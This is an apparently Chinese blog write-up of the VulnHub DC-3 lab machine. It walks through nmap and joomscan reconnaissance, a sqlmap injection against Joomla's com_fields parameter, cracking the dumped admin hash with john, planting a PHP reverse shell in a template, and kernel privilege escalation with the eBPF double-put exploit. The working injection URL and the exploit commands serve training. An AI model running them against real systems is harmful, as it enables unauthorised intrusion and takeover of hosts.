vulnhub-dc-3

vulnhub-dc-3

  • 知识点
  • nmap
  • joomlaCMS的sql注入
  • 反弹shell
  • 内核提权ubuntu 16.04

vulnhub第四个靶机

靶机地址: https://www.vulnhub.com/entry/dc-32,312/.

知识点

nmap

用nmap查询局域网内存活的主机,发现靶机ip

nmap 192.168.88.0/24 -T4

vulnhub-dc-3_第1张图片
用nmap进行更详细的探测,发现开着的端口和服务

端口 服务
80 http
nmap 192.168.88.139 -T4 -A -sV -p-

nmap扫出了是joomlaCMS,在github上有专门的扫描工具 joomscan.

vulnhub-dc-3_第2张图片

joomlaCMS的sql注入

端口:80——>web漏洞——>成功

用joomscan对其进行扫描,发现网站管理后台和joomla版本

./joomscan.pl --url 192.168.88.139 

vulnhub-dc-3_第3张图片
在kali中寻找该版本漏洞信息,发现两条关于注入的利用方法,我这里使用的是42033.txt里面的方法

vulnhub-dc-3_第4张图片
注入成功

sqlmap -u "http://192.168.88.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs

vulnhub-dc-3_第5张图片
成功爆出用户名和hash密码,再配合john爆破hash,成功获取明文密码。

sqlmap -u "http://192.168.88.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D 'joomladb' -T '#__users' -C 'name','password'  --dump

vulnhub-dc-3_第6张图片

john --wordlist=rockyou.txt dc3.txt

admin:snoopy

vulnhub-dc-3_第7张图片

反弹shell

如下图所示编写nc的php反弹shell,在kali设置监听,然后访问木马,即可收到反弹shell

vulnhub-dc-3_第8张图片
需要注意的是这个一句话的路径是:http://192.168.88.139/templates/beez3/index.php

vulnhub-dc-3_第9张图片
在这里插入图片描述
vulnhub-dc-3_第10张图片vulnhub-dc-3_第11张图片

内核提权ubuntu 16.04

python -c "import pty;pty.spawn('/bin/bash')"

接下来就是提权部分,但是查看了一下,没有可执行sudo命令的用户,没有suid权限的可执行命令或者文件,没有定时任务,没有权限滥用危险文件。万不得已只能试一下内核提权了。

vulnhub-dc-3_第12张图片

searchsploit ubuntu 16.04 
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
wget 
unzip 39772.zip  #解压29772.zip文件
cd 39772
tar -xvf exploit.tar  #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit
./compile.sh 
./doubleput
id

vulnhub-dc-3_第13张图片

参考链接: https://blog.csdn.net/weixin_44426869/article/details/104779201?fps=1&locationNum=2.

你可能感兴趣的:(vulnhub)